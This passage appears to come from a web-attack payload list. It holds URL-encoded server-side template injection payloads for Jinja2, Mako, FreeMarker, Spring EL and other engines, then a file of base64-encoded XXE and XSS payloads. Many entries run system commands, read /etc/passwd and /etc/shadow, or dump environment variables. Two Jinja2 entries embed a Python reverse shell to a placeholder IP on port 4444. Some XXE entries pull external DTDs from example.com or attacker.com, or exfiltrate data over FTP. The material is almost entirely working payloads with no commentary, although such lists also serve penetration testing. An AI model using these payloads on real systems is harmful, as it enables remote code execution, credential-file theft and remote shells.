%24%7BT%28java.lang.System%29.getenv%28%29%7D 13 | %24%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28T%28java.lang.Character%29.toString%2899%29.concat%28T%28java.lang.Character%29.toString%2897%29%29.concat%28T%28java.lang.Character%29.toString%28116%29%29.concat%28T%28java.lang.Character%29.toString%2832%29%29.concat%28T%28java.lang.Character%29.toString%2847%29%29.concat%28T%28java.lang.Character%29.toString%28101%29%29.concat%28T%28java.lang.Character%29.toString%28116%29%29.concat%28T%28java.lang.Character%29.toString%2899%29%29.concat%28T%28java.lang.Character%29.toString%2847%29%29.concat%28T%28java.lang.Character%29.toString%28112%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29.concat%28T%28java.lang.Character%29.toString%28115%29%29.concat%28T%28java.lang.Character%29.toString%28115%29%29.concat%28T%28java.lang.Character%29.toString%28119%29%29.concat%28T%28java.lang.Character%29.toString%28100%29%29%29.getInputStream%28%29%29%7D 14 | %24%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28T%28java.lang.Character%29.toString%2899%29.concat%28T%28java.lang.Character%29.toString%2897%29%29.concat%28T%28java.lang.Character%29.toString%28116%29%29.concat%28T%28java.lang.Character%29.toString%2832%29%29.concat%28T%28java.lang.Character%29.toString%2847%29%29.concat%28T%28java.lang.Character%29.toString%28101%29%29.concat%28T%28java.lang.Character%29.toString%28116%29%29.concat%28T%28java.lang.Character%29.toString%2899%29%29.concat%28T%28java.lang.Character%29.toString%2847%29%29.concat%28T%28java.lang.Character%29.toString%28112%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29.concat%28T%28java.lang.Character%29.toString%28115%29%29.concat%28T%28java.lang.Character%29.toString%28115%29%29.concat%28T%28java.lang.Character%29.toString%28119%29%29.concat%28T%28java.lang.Character%29.toString%28100%29%29%29.getInputStream%28%29%29%7D%24%7Bself.module.cache.util.os.system%28%22id%22%29%7D 15 | %24%7Bdonotexists%7C42%2A42%7D 16 | %24%7Bself.__init__.__globals__%5B%27util%27%5D.os.system%28%27id%27%29%7D 17 | %24%7Bself.attr._NSAttr__parent.module.cache.compat.inspect.os.system%28%22id%22%29%7D 18 | %24%7Bself.attr._NSAttr__parent.module.cache.util.os.system%28%22id%22%29%7D 19 | %24%7Bself.attr._NSAttr__parent.module.filters.compat.inspect.os.system%28%22id%22%29%7D 20 | %24%7Bself.attr._NSAttr__parent.module.runtime.compat.inspect.os.system%28%22id%22%29%7D 21 | %24%7Bself.attr._NSAttr__parent.module.runtime.exceptions.util.os.system%28%22id%22%29%7D 22 | %24%7Bself.attr._NSAttr__parent.module.runtime.util.os.system%28%22id%22%29%7D 23 | %24%7Bself.attr._NSAttr__parent.template.module.cache.util.os.system%28%22id%22%29%7D 24 | %24%7Bself.attr._NSAttr__parent.template.module.runtime.util.os.system%28%22id%22%29%7D 25 | %24%7Bself.context._with_template._mmarker.module.cache.util.os.system%28%22id%22%29%7D 26 | %24%7Bself.context._with_template._mmarker.module.runtime.util.os.system%28%22id%22%29%7D 27 | %24%7Bself.context._with_template.module.cache.compat.inspect.os.system%28%22id%22%29%7D 28 | %24%7Bself.context._with_template.module.cache.util.os.system%28%22id%22%29%7D 29 | %24%7Bself.context._with_template.module.filters.compat.inspect.os.system%28%22id%22%29%7D 30 | %24%7Bself.context._with_template.module.runtime.compat.inspect.os.system%28%22id%22%29%7D 31 | %24%7Bself.context._with_template.module.runtime.exceptions.util.os.system%28%22id%22%29%7D 32 | %24%7Bself.context._with_template.module.runtime.util.os.system%28%22id%22%29%7D 33 | %24%7Bself.module.cache.compat.inspect.linecache.os.system%28%22id%22%29%7D 34 | %24%7Bself.module.cache.compat.inspect.os.system%28%22id%22%29%7D 35 | %24%7Bself.module.cache.util.compat.inspect.linecache.os.system%28%22id%22%29%7D 36 | %24%7Bself.module.cache.util.compat.inspect.os.system%28%22id%22%29%7D 37 | %24%7Bself.module.filters.compat.inspect.linecache.os.system%28%22id%22%29%7D 38 | %24%7Bself.module.filters.compat.inspect.os.system%28%22id%22%29%7D 39 | %24%7Bself.module.runtime.compat.inspect.linecache.os.system%28%22id%22%29%7D 40 | %24%7Bself.module.runtime.compat.inspect.os.system%28%22id%22%29%7D 41 | %24%7Bself.module.runtime.exceptions.compat.inspect.linecache.os.system%28%22id%22%29%7D 42 | %24%7Bself.module.runtime.exceptions.compat.inspect.os.system%28%22id%22%29%7D 43 | %24%7Bself.module.runtime.exceptions.traceback.linecache.os.system%28%22id%22%29%7D 44 | %24%7Bself.module.runtime.exceptions.util.compat.inspect.os.system%28%22id%22%29%7D 45 | %24%7Bself.module.runtime.exceptions.util.os.system%28%22id%22%29%7D 46 | %24%7Bself.module.runtime.util.compat.inspect.linecache.os.system%28%22id%22%29%7D 47 | %24%7Bself.module.runtime.util.compat.inspect.os.system%28%22id%22%29%7D 48 | %24%7Bself.module.runtime.util.os.system%28%22id%22%29%7D 49 | %24%7Bself.template.__init__.__globals__%5B%27os%27%5D.system%28%27id%27%29%7D 50 | %24%7Bself.template._mmarker.module.cache.compat.inspect.os.system%28%22id%22%29%7D 51 | %24%7Bself.template._mmarker.module.cache.util.os.system%28%22id%22%29%7D 52 | %24%7Bself.template._mmarker.module.filters.compat.inspect.os.system%28%22id%22%29%7D 53 | %24%7Bself.template._mmarker.module.runtime.compat.inspect.os.system%28%22id%22%29%7D 54 | %24%7Bself.template._mmarker.module.runtime.exceptions.util.os.system%28%22id%22%29%7D 55 | %24%7Bself.template._mmarker.module.runtime.util.os.system%28%22id%22%29%7D 56 | %24%7Bself.template.module.cache.compat.inspect.linecache.os.system%28%22id%22%29%7D 57 | %24%7Bself.template.module.cache.compat.inspect.os.system%28%22id%22%29%7D 58 | %24%7Bself.template.module.cache.util.compat.inspect.os.system%28%22id%22%29%7D 59 | %24%7Bself.template.module.cache.util.os.system%28%22id%22%29%7D 60 | %24%7Bself.template.module.filters.compat.inspect.linecache.os.system%28%22id%22%29%7D 61 | %24%7Bself.template.module.filters.compat.inspect.os.system%28%22id%22%29%7D 62 | %24%7Bself.template.module.runtime.compat.inspect.linecache.os.system%28%22id%22%29%7D 63 | %24%7Bself.template.module.runtime.compat.inspect.os.system%28%22id%22%29%7D 64 | %24%7Bself.template.module.runtime.exceptions.compat.inspect.os.system%28%22id%22%29%7D 65 | %24%7Bself.template.module.runtime.exceptions.traceback.linecache.os.system%28%22id%22%29%7D 66 | %24%7Bself.template.module.runtime.exceptions.util.os.system%28%22id%22%29%7D 67 | %24%7Bself.template.module.runtime.util.compat.inspect.os.system%28%22id%22%29%7D 68 | %24%7Bself.template.module.runtime.util.os.system%28%22id%22%29%7D 69 | %24%7B%7B3%2A3%7D%7D 70 | %24%7B%7B7%2A7%7D%7D 71 | %24%7B%7B%3C%25%5B%25%27%22%7D%7D%25%5C 72 | %2A%7B7%2A7%7D 73 | %2A%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%7D 74 | 42%2A42 75 | %3C%23assign%20ex%20%3D%20%22freemarker.template.utility.Execute%22%3Fnew%28%29%3E%24%7B%20ex%28%22id%22%29%7D 76 | %3C%25%3D%203%20%2A%203%20%25%3E 77 | %3C%25%3D%207%20%2A%207%20%25%3E 78 | %3C%25%3D%207%2A7%20%25%3E 79 | %3C%25%3D%20File.open%28%27/etc/passwd%27%29.read%20%25%3E 80 | %3C%25%3D42%2A42%20%25%3E 81 | %40%281%2B2%29 82 | %40%286%2B5%29 83 | %5B%23assign%20ex%20%3D%20%27freemarker.template.utility.Execute%27%3Fnew%28%29%5D%24%7B%20ex%28%27id%27%29%7D 84 | %5B7%2A7%5D 85 | %5B%5B%24%7B42%2A42%7D%5D%5D 86 | %7B%24smarty.version%7D 87 | %7B%25%20for%20key%2C%20value%20in%20config.iteritems%28%29%20%25%7D%3Cdt%3E%7B%7B%20key%7Ce%20%7D%7D%3C/dt%3E%3Cdd%3E%7B%7B%20value%7Ce%20%7D%7D%3C/dd%3E%7B%25%20endfor%20%25%7D 88 | %7B%25%20for%20x%20in%20%28%29.__class__.__base__.__subclasses__%28%29%20%25%7D%7B%25%20if%20%22warning%22%20in%20x.__name__%20%25%7D%7B%7Bx%28%29._module.__builtins__%5B%27__import__%27%5D%28%27os%27%29.popen%28%22python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%5C%22ip%5C%22%2C4444%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%5C%22/bin/cat%5C%22%2C%20%5C%22/etc/passwd%5C%22%5D%29%3B%27%22%29.read%28%29.zfill%28417%29%7D%7D%7B%25endif%25%7D%7B%25%20endfor%20%25%7D 89 | %7B%25%20for%20x%20in%20%28%29.__class__.__base__.__subclasses__%28%29%20%25%7D%7B%25%20if%20%22warning%22%20in%20x.__name__%20%25%7D%7B%7Bx%28%29._module.__builtins__%5B%27__import__%27%5D%28%27os%27%29.popen%28%22python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%5C%22ip%5C%22%2C4444%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%5C%22/bin/cat%5C%22%2C%20%5C%22flag.txt%5C%22%5D%29%3B%27%22%29.read%28%29.zfill%28417%29%7D%7D%7B%25endif%25%7D%7B%25%20endfor%20%25%7D 90 | %7B%25%20for%20x%20in%20%28%29.__class__.__base__.__subclasses__%28%29%20%25%7D%7B%25%20if%20%22warning%22%20in%20x.__name__%20%25%7D%7B%7Bx%28%29._module.__builtins__%5B%27__import__%27%5D%28%27os%27%29.popen%28request.args.input%29.read%28%29%7D%7D%7B%25endif%25%7D%7B%25endfor%25%7D 91 | %7B42%2A42%7D 92 | %7B%5Exyzm42%7D1764%7B/xyzm42%7D 93 | %7Bphp%7Decho%20%60id%60%3B%7B/php%7D 94 | %7B%7B%20%27%27.__class__.__mro__%5B2%5D.__subclasses__%28%29%20%7D%7D 95 | %7B%7B%20%27%27.__class__.__mro__%5B2%5D.__subclasses__%28%29%5B40%5D%28%27/etc/passwd%27%29.read%28%29%20%7D%7D 96 | %7B%7B%20%5B%5D.class.base.subclasses%28%29%20%7D%7D 97 | %7B%7B%20config.items%28%29%5B4%5D%5B1%5D.__class__.__mro__%5B2%5D.__subclasses__%28%29%5B40%5D%28%22/etc/passwd%22%29.read%28%29%20%7D%7D 98 | %7B%7B%20request%20%7D%7D 99 | %7B%7B%27%27.__class__.__base__.__subclasses__%28%29%5B227%5D%28%27cat%20/etc/passwd%27%2C%20shell%3DTrue%2C%20stdout%3D-1%29.communicate%28%29%7D%7D 100 | %7B%7B%27%27.__class__.mro%28%29%5B1%5D.__subclasses__%28%29%5B396%5D%28%27cat%20/etc/passwd%27%2Cshell%3DTrue%2Cstdout%3D-1%29.communicate%28%29%5B0%5D.strip%28%29%7D%7D 101 | %7B%7B%27%27.__class__.mro%28%29%5B1%5D.__subclasses__%28%29%5B396%5D%28%27cat%20flag.txt%27%2Cshell%3DTrue%2Cstdout%3D-1%29.communicate%28%29%5B0%5D.strip%28%29%7D%7D 102 | %7B%7B%27%27.class.mro%28%29%5B1%5D.subclasses%28%29%7D%7D 103 | %7B%7B%27a%27.getClass%28%29.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27JavaScript%27%29.eval%28%5C%22new%20java.lang.String%28%27xxx%27%29%5C%22%29%7D%7D 104 | %7B%7B%27a%27.getClass%28%29.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27JavaScript%27%29.eval%28%5C%22var%20x%3Dnew%20java.lang.ProcessBuilder%3B%20x.command%28%5C%5C%5C%22netstat%5C%5C%5C%22%29%3B%20org.apache.commons.io.IOUtils.toString%28x.start%28%29.getInputStream%28%29%29%5C%22%29%7D%7D 105 | %7B%7B%27a%27.getClass%28%29.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27JavaScript%27%29.eval%28%5C%22var%20x%3Dnew%20java.lang.ProcessBuilder%3B%20x.command%28%5C%5C%5C%22uname%5C%5C%5C%22%2C%5C%5C%5C%22-a%5C%5C%5C%22%29%3B%20org.apache.commons.io.IOUtils.toString%28x.start%28%29.getInputStream%28%29%29%5C%22%29%7D%7D 106 | %7B%7B%27a%27.getClass%28%29.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27JavaScript%27%29.eval%28%5C%22var%20x%3Dnew%20java.lang.ProcessBuilder%3B%20x.command%28%5C%5C%5C%22whoami%5C%5C%5C%22%29%3B%20x.start%28%29%5C%22%29%7D%7D 107 | %7B%7B%27a%27.toUpperCase%28%29%7D%7D 108 | %7B%7B2%2A2%7D%7D%5B%5B3%2A3%5D%5D 109 | %7B%7B3%2A%273%27%7D%7D 110 | %7B%7B3%2A3%7D%7D 111 | %7B%7B4%2A4%7D%7D%5B%5B5%2A5%5D%5D 112 | %7B%7B42%2A42%7D%7D 113 | %7B%7B7%2A%277%27%7D%7D 114 | %7B%7B7%2A7%7D%7D 115 | %7B%7B7%2A7%7D%7D%24%7B7%2A7%7D%3C%25%3D%207%2A7%20%25%3E%24%7B%7B7%2A7%7D%7D%23%7B7%2A7%7D%24%7B%7B%3C%25%5B%25%27%22%7D%7D%25%5C 116 | %7B%7B%3D42%2A42%7D%7D 117 | %7B%7B%5B%27cat%24IFS/etc/passwd%27%5D%7Cfilter%28%27system%27%29%7D%7D 118 | %7B%7B%5B%27cat%5Cx20/etc/passwd%27%5D%7Cfilter%28%27system%27%29%7D%7D 119 | %7B%7B%5B%27id%27%5D%7Cfilter%28%27system%27%29%7D%7D 120 | %7B%7Bapp.request.query.filter%280%2C0%2C1024%2C%7B%27options%27%3A%27system%27%7D%29%7D%7D 121 | %7B%7Bapp.request.server.all%7Cjoin%28%27%2C%27%29%7D%7D 122 | %7B%7Bconfig.__class__.__init__.__globals__%5B%27os%27%5D.popen%28%27ls%27%29.read%28%29%7D%7D 123 | %7B%7Bconfig.items%28%29%7D%7D 124 | %7B%7Bcycler.__init__.__globals__.os%7D%7D 125 | %7B%7Bdump%28app%29%7D%7D 126 | %7B%7Bjoiner.__init__.__globals__.os%7D%7D 127 | %7B%7Bnamespace.__init__.__globals__.os%7D%7D 128 | %7B%7Brequest.__class__%7D%7D 129 | %7B%7Brequest%7Cattr%28%22__class__%22%29%7D%7D 130 | %7B%7Brequest%7Cattr%28%27application%27%29%7Cattr%28%27%5Cx5f%5Cx5fglobals%5Cx5f%5Cx5f%27%29%7Cattr%28%27%5Cx5f%5Cx5fgetitem%5Cx5f%5Cx5f%27%29%28%27%5Cx5f%5Cx5fbuiltins%5Cx5f%5Cx5f%27%29%7Cattr%28%27%5Cx5f%5Cx5fgetitem%5Cx5f%5Cx5f%27%29%28%27%5Cx5f%5Cx5fimport%5Cx5f%5Cx5f%27%29%28%27os%27%29%7Cattr%28%27popen%27%29%28%27id%27%29%7Cattr%28%27read%27%29%28%29%7D%7D 131 | %7B%7Brequest%7Cattr%28%5B%22_%22%2A2%2C%22class%22%2C%22_%22%2A2%5D%7Cjoin%29%7D%7D 132 | %7B%7Brequest%7Cattr%28%5B%22__%22%2C%22class%22%2C%22__%22%5D%7Cjoin%29%7D%7D 133 | %7B%7Brequest%7Cattr%28%5Brequest.args.usc%2A2%2Crequest.args.class%2Crequest.args.usc%2A2%5D%7Cjoin%29%7D%7D 134 | %7B%7Bself._TemplateReference__context.cycler.__init__.__globals__.os%7D%7D 135 | %7B%7Bself._TemplateReference__context.joiner.__init__.__globals__.os%7D%7D 136 | %7B%7Bself._TemplateReference__context.namespace.__init__.__globals__.os%7D%7D 137 | %7B%7Bself%7D%7D 138 | %7B%7B%7B42%2A42%7D%7D%7D 139 | -------------------------------------------------------------------------------- /XXE/base64_encoded.txt: -------------------------------------------------------------------------------- 1 | IjxIVE1MIHhtbG5zOnhzcz48P2ltcG9ydCBuYW1lc3BhY2U9IiJ4c3MiIiBpbXBsZW1lbnRhdGlvbj0iImh0dHA6Ly9oYS5ja2Vycy5vcmcveHNzLmh0YyIiPjx4c3M6eHNzPlhTUzwveHNzOnhzcz48L0hUTUw+Ig== 2 | Ijx4bWwgSUQ9IiJ4c3MiIj48ST48Qj48SU1HIFNSQz0iImphdmFzPCEtLSAtLT5jcmlwdDphbGVydCgnWFNTJykiIj48L0I+PC9JPjwveG1sPjxTUEFOIERBVEFTUkM9IiIjeHNzIiIgREFUQUZMRD0iIkIiIiBEQVRBRk9STUFUQVM9IiJIVE1MIiI+PC9TUEFOPjwvQz48L1g+PC94bWw+PFNQQU4gREFUQVNSQz0jSSBEQVRBRkxEPUMgREFUQUZPUk1BVEFTPUhUTUw+PC9TUEFOPiI= 3 | Ijx4bWwgSUQ9ST48WD48Qz48IVtDREFUQVs8SU1HIFNSQz0iImphdmFzXV0+PCFbQ0RBVEFbY3JpcHQ6YWxlcnQoJ1hTUycpOyIiPl1dPiI= 4 | Ijx4bWwgU1JDPSIieHNzdGVzdC54bWwiIiBJRD1JPjwveG1sPjxTUEFOIERBVEFTUkM9I0kgREFUQUZMRD1DIERBVEFGT1JNQVRBUz1IVE1MPjwvU1BBTj4i 5 | In19PC9zY3JpcHQ+Jw== 6 | In19PC9zY3JpcHQ+PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD48L2JvZHk+PC9odG1sPjwhLS0= 7 | IyMgQWZ0ZXIgWE1MIERlY2xhcmF0aW9u 8 | IyMgRWxlbWVudCBhbmQgQXR0cmliIFZhbHVlcw== 9 | JA== 10 | JQ== 11 | JWZvbzs= 12 | JmFwb3M7WG9pWlI= 13 | JmZvbzs= 14 | Jmx0OyUgVG5uOTYgJSZndDs= 15 | Jmx0OyU9IFRubjk2ICUmZ3Q7 16 | Jmx0Oz8gVG5uOTYgPyZndDs= 17 | Jmx0Oz9Ubm45NiA/Jmd0Ow== 18 | Jmx0O1Rubjk2Jmd0Ow== 19 | JnF1b3Q7WG9pWlI= 20 | JyBvciAnJz0n 21 | JyBvciAnMSc9JzE= 22 | J319PC9zY3JpcHQ+Ig== 23 | J319PC9zY3JpcHQ+Jw== 24 | KFRubjk2KQ== 25 | Kg== 26 | Ki8q 27 | Kw== 28 | LQ== 29 | LTE= 30 | Lw== 31 | Ly8= 32 | Ly8q 33 | MA== 34 | MC4wMDAwNQ== 35 | MC4x 36 | MC45 37 | MQ== 38 | MS43OTc2OTMxMzQ4NjIzMTU3ZSszMDg= 39 | NWUtMTA= 40 | NWUtMzI0 41 | Og== 42 | Ow== 43 | PCFET0NUWVBFIGF1dG9maWxsdXBsb2FkIFs8IUVOVElUWSA5ZVRWQyBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCI+ 44 | PCFET0NUWVBFIGF1dG9maWxsdXBsb2FkIFs8IUVOVElUWSBENzFNbiBTWVNURU0gImZpbGU6Ly8vYzovYm9vdC5pbmkiPg== 45 | PCFET0NUWVBFIGZvbyBbPCFFTEVNRU5UIGZvbyBBTlkgPjwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vYzovYm9vdC5pbmkiID5dPg== 46 | PCFET0NUWVBFIGZvbyBbPCFFTEVNRU5UIGZvbyBBTlkgPjwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgPl0+ 47 | PCFET0NUWVBFIGZvbyBbPCFFTEVNRU5UIGZvbyBBTlkgPjwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3NoYWRvdyIgPl0+ 48 | PCFET0NUWVBFIGZvbyBbPCFFTEVNRU5UIGZvbyBBTlkgPjwhRU5USVRZIHh4ZSBTWVNURU0gImh0dHA6Ly9leGFtcGxlLmNvbS90ZXh0LnR4dCIgPl0+ 49 | PCFET0NUWVBFIGZvbyBbPCFFTEVNRU5UIGZvbyBBTlk+PCFFTlRJVFkgeHhlIFNZU1RFTSAiZmlsZTovLy8vZGV2L3JhbmRvbSI+XT4= 50 | PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgeHhlNDY0NzEgU1lTVEVNICJodHRwOi8vY3Jvd2RzaGllbGQuY29tLy50ZXN0aW5nL3JmaV92dWxuLnR4dCI+IF0+ 51 | PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgeHhlN2ViOTcgU1lTVEVNICJmaWxlOi8vL2M6L2Jvb3QuaW5pIj4gXT4= 52 | PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgeHhlN2ViOTcgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg== 53 | PCFET0NUWVBFIHh4ZSBbIDwhRU5USVRZICUgZmlsZSBTWVNURU0gImZpbGU6Ly8vYzovYm9vdC5pbmkiPjwhRU5USVRZICUgZHRkIFNZU1RFTSAiaHR0cDovL2V4YW1wbGUuY29tL2V2aWwuZHRkIj4lZHRkOyV0cmljaztdPg== 54 | PCFET0NUWVBFIHh4ZSBbIDwhRU5USVRZICUgZmlsZSBTWVNURU0gImZpbGU6Ly8vZXRjL2lzc3VlIj48IUVOVElUWSAlIGR0ZCBTWVNURU0gImh0dHA6Ly9leGFtcGxlLmNvbS9ldmlsLmR0ZCI+JWR0ZDsldHJpY2s7XT4= 55 | PCFET0NUWVBFIHh4ZSBbPCFFTlRJVFkgZm9vICJhYWFhYWEiPl0+ 56 | PCFET0NUWVBFIHh4ZSBbPCFFTlRJVFkgZm9vICJhYWFhYWEiPl0+PHJvb3Q+JmZvbzs8L3Jvb3Q+ 57 | PCFFTlRJVFkgJSBpbnQgIjwhRU5USVRZICYjMzc7IHRyaWNrIFNZU1RFTSAnaHR0cDovLzEyNy4wLjAuMTo4MC8/JWZpbGU7Jz4gICI+ICVpbnQ7 58 | PCFFTlRJVFkgJSBpbnQgIjwhRU5USVRZICYjMzc7IHRyaWNrIFNZU1RFTSAnaHR0cDovLzEyNy4wLjAuMTo4MC8/JWZpbGU7Jz7CoCAiPiAlaW50Ow== 59 | PCFFTlRJVFkgJSBwYXJhbTMgIjwhRU5USVRZICYjeDI1OyBleGZpbCBTWVNURU0gJ2Z0cDovLzEyNy4wLjAuMToyMS8lZGF0YTM7Jz4iPg== 60 | PCFFTlRJVFkgJSB4eGUgU1lTVEVNICJwaHA6Ly9maWx0ZXIvY29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPS9ldGMvcGFzc3dkIiA+ 61 | PCFFTlRJVFkgc3lzdGVtRW50aXR5IFNZU1RFTSAicm9ib3RzLnR4dCI+ 62 | PCFbQ0RBVEFbPF1dPlNDUklQVDwhW0NEQVRBWz5dXT5hbGVydCgnWFNTJyk7PCFbQ0RBVEFbPF1dPi9TQ1JJUFQ8IVtDREFUQVs+XV0+ 63 | PCFbQ0RBVEFbPF1dPnNjcmlwdDwhW0NEQVRBWz5dXT5hbGVydCgneHNzJyk8IVtDREFUQVs8XV0+L3NjcmlwdDwhW0NEQVRBWz5dXT4= 64 | PCFbQ0RBVEFbPHNjcmlwdD52YXIgbj0wO3doaWxlKHRydWUpe24rKzt9PC9zY3JpcHQ+XV0+ 65 | PCFbQ0RBVEFbPHRlc3Q+PC90ZXN0Pl1dPg== 66 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/Pg== 67 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PiA8IURPQ1RZUEUgZm9vIFsgICAgIDwhRUxFTUVOVCBmb28gQU5ZID4gICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9zaGFkb3ciID5dPjxmb28+Jnh4ZTs8L2Zvbz4= 68 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PiA8IURPQ1RZUEUgZm9vIFsgICAgIDwhRUxFTUVOVCBmb28gQU5ZID4gICA8IUVOVElUWSB4eGUgU1lTVEVNICJodHRwczovL2Nyb3dkc2hpZWxkLmNvbS8udGVzdGluZy9yZmkudHh0IiA+XT48Zm9vPiZ4eGU7PC9mb28+ 69 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PiA8IURPQ1RZUEUgZm9vIFsgICAgIDwhRUxFTUVOVCBmb28gQU5ZID4gIDwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vYzovYm9vdC5pbmkiID5dPjxmb28+Jnh4ZTs8L2Zvbz4= 70 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PiA8IURPQ1RZUEUgZm9vIFsgICAgIDwhRUxFTUVOVCBmb28gQU5ZID4gIDwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgPl0+PGZvbz4meHhlOzwvZm9vPg== 71 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWyA8IUVMRU1FTlQgZm9vIEFOWT48IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg== 72 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZID48IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2M6L2Jvb3QuaW5pIiA+XT4= 73 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZID48IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2M6L2Jvb3QuaW5pIiA+XT48Zm9vPiZ4eGU7PC9mb28+ 74 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZID48IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2M6L2Jvb3QuaW5pIiA+XT48Zm9vPiZ4eGU7PC9mb28+IDw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz48IURPQ1RZUEUgZm9vIFs8IUVMRU1FTlQgZm9vIEFOWSA+ICAgPCFFTlRJVFkgeHhlIFNZU1RFTSAiaHR0cDovL3d3dy5hdHRhY2tlci5jb20vdGV4dC50eHQiPl0+PGZvbz4meHhlOzwvZm9vPg== 75 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZID48IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9pc3N1ZSIgPl0+ 76 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZID48IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9pc3N1ZSIgPl0+PGZvbz4meHhlOzwvZm9vPg== 77 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZID48IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiID5dPg== 78 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZID48IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiID5dPjxmb28+Jnh4ZTs8L2Zvbz4= 79 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZID48IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiID5dPjxmb28+Jnh4ZTs8L2Zvbz48P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJJU08tODg1OS0xIj8+PCFET0NUWVBFIGZvbyBbPCFFTEVNRU5UIGZvbyBBTlkgPjwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3NoYWRvdyI+XT48Zm9vPiZ4eGU7PC9mb28+ 80 | PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWzwhRUxFTUVOVCBmb28gQU5ZID48IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9zaGFkb3ciID5dPg== 81 | 